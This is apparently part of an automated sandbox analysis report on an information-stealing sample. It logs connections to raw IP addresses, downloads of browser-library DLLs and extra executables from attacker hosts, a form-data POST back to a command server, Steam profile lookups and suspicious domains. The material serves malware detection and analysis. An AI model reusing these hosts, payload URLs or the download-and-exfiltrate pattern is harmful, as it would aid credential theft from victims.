Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_00406963
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic DNS traffic detected: DNS query: questionsmw.store
Source: global traffic DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic DNS traffic detected: DNS query: treatynreit.site
Source: global traffic DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic DNS traffic detected: DNS query: mysterisop.site
Source: global traffic DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic DNS traffic detected: DNS query: gravvitywio.store
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe1kkkk1263520http://147.45.44.104/ldms/66fbfccd837a
Source: RegAsm.exe, 0000000F.00000002.2782993650.00000000277C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeX
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exerm-data;
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.000000000149E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe-data;
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.000000000101F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exe
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exeform-data;
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.00000000005CB000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000148F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000148F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/)
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll=
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll3
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dllO
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dlly
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000149E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000148F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.00000000005CB000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php1f9a9c4a2f8b514.cdf-ms
Source: RegAsm.exe, 0000000F.00000002.2782993650.00000000277C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpp
Source: RegAsm.exe, 0000000F.00000002.2759155964.00000000005CB000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----KJKJKFCBKKJDGDHIDBGIultrelease
Source: RegAsm.exe, 0000000F.00000002.2759155964.00000000005CB000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109JKJEorm-data;
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.8.231.109Ra
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.GCFCAKEBKJJE
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.EBKJJE
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000002.00000002.2340395451.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgJJE
Source: file.exe, 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoKEBKJJE
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, softokn3[1].dll.15.dr, GDBFCGIIIJ.exe.2.dr, softokn3.dll.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: KJEGDBKFIJ.exe.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
